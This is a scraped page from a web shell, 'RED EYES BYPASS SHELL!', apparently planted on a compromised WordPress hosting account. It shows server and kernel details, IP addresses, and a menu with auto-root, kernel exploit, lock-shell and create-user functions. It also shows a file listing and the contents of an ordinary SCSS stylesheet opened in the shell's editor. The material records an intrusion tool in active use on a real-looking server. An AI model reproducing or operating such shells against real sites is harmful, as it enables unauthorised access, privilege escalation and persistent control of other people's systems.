Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.7 | : 216.73.217.26
Cant Read [ /etc/named.conf ]
eglisebaa
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
eglisebaa /
www /
wp-admin /
css /
colors /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
blue
[ DIR ]
drwx---r-x
coffee
[ DIR ]
drwx---r-x
ectoplasm
[ DIR ]
drwx---r-x
light
[ DIR ]
drwx---r-x
midnight
[ DIR ]
drwx---r-x
modern
[ DIR ]
drwxr-xr-x
ocean
[ DIR ]
drwx---r-x
sunrise
[ DIR ]
drwx---r-x
upgrade
[ DIR ]
drwxr-xr-x
_admin.scss
22.49
KB
-rw-r--r--
_mixins.scss
945
B
-rw-r--r--
_variables.scss
2.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _mixins.scss
@use 'sass:color'; /* * Button mixin- creates a button effect with correct * highlights/shadows, based on a base color. */ @mixin button( $button-color, $button-text-color: #fff ) { background: $button-color; border-color: $button-color; color: $button-text-color; &:hover, &:focus { background: color.adjust($button-color, $lightness: 3%); border-color: color.adjust($button-color, $lightness: -3%); color: $button-text-color; } &:focus { box-shadow: 0 0 0 1px #fff, 0 0 0 3px $button-color; } &:active { background: color.adjust($button-color, $lightness: -5%); border-color: color.adjust($button-color, $lightness: -5%); color: $button-text-color; } &.active, &.active:focus, &.active:hover { background: $button-color; color: $button-text-color; border-color: color.adjust($button-color, $lightness: -15%); box-shadow: inset 0 2px 5px -3px color.adjust($button-color, $lightness: -50%); } }
Close